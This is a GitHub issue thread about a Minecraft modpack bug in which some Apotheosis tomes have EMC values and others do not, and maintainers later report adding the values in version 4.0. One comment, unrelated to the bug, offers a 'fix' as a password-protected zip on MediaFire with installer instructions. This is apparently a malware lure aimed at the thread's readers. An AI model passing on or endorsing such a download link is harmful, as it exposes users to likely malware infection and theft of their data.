### ISSUE TITLE
EMC on Some books and not Others Apotheosis

### ISSUE THREAD

**Issue by DiggityMan420** [ChosenArchitect/Project-Architect-2#181]
**Describe the bug**
-> Some of the Special Tome's, the ones to get enchants for a certain types of item (See Images) have EMC attached to them an not others Ex. Tome of Weaponry and the 1st Tome of Scrapping possible having EMC but not the Higher tiers. they need to be enchanted Ex. Superiors Scrapping and Tome of Extraction (See Images)

**To Reproduce**
1. Log on
2. open jei and Search @apoh
3. look for tomes. 

**Expected behavior**
-> emc or removing of

**Screenshots**
 Example 1 & 2
If applicable, add screenshots to help explain your problem. (Use F2 to take a screenshot in-game)
![Screenshot_53](https://github.com/user-attachments/assets/caa2b09b-70a9-48f0-94dc-54c006e9d023)
![Screenshot_54](https://github.com/user-attachments/assets/d1f88e4d-2008-4a0d-a6c5-97021c9432a5)

 Example No EMC
![Screenshot_55](https://github.com/user-attachments/assets/ce3346a0-031e-4c47-901c-9ead85f72306)

 This is the Scraping tome 
![Screenshot_56](https://github.com/user-attachments/assets/c86619f8-441b-42dd-8bde-29835cb47851)
 Not this one
![Screenshot_57](https://github.com/user-attachments/assets/f413b19a-2d46-4bcc-8ae5-74152fd930e3)

**Modpack version**
-> 3.5
**Java Version**
->21.0.4 64bit

**Modpack Launcher Used**
-> Curseforge
& Atlauncher

**Ram Allocated**
->10gb

**Additional context**
->if i was to add emc i would maybe add it to the weaponry one and only the 1st tier of scrapping to you would have to enchant the others

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by IRicTheCoder** [comment]
Seems logical to introduce some EMC to the Tome of Weaponry and Tome of Scraping (normal one). We will see, thanks for the suggestion and feedback.

**Comment by IRicTheCoder** [comment]
These EMC values were added in version 4.0, so they should now have values. Closing this as added, thanks for the feedback!
